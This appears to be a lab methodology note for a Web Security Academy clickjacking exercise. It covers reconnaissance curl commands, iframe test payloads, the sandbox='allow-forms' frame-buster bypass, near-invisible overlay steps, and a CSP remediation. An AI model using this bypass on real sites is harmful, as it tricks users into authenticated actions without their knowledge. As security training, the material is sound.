=============================================================
 FRAME-BUSTER BYPASS — METHODOLOGY
=============================================================

PHASE 1 — RECONNAISSANCE
─────────────────────────
1. Check headers:
   curl -sI https://<LAB-ID>.web-security-academy.net | grep -i 'x-frame\|content-security'
   → Confirm no X-Frame-Options or CSP frame-ancestors

2. View page source for frame buster script:
   curl -s https://<LAB-ID>.web-security-academy.net/my-account | grep -i 'top.location\|self.location'
   → Confirm frame buster is present

3. Test naive iframe (no sandbox) — verify frame buster redirects:
   <iframe src="https://TARGET_URL/my-account"></iframe>
   → Page should redirect out of frame

4. Test with sandbox="allow-forms":
   <iframe src="https://TARGET_URL/my-account" sandbox="allow-forms"></iframe>
   → Page should load without redirect (bypass confirmed)

PHASE 2 — EXPLOIT
──────────────────
1. Edit exploit/exploit.html, set TARGET_URL
2. Note: iframe uses sandbox="allow-forms" (critical difference from Lab 1)
3. Debug alignment with opacity: 0.5
4. Set opacity back to 0.0001
5. Host on exploit server and deliver

PHASE 3 — REPORTING KEY POINTS
────────────────────────────────
- Frame buster bypassed via HTML5 sandbox attribute
- No user interaction beyond a single click required
- Authenticated action performed without user's knowledge
- Recommendation: Replace JS frame buster with CSP frame-ancestors header
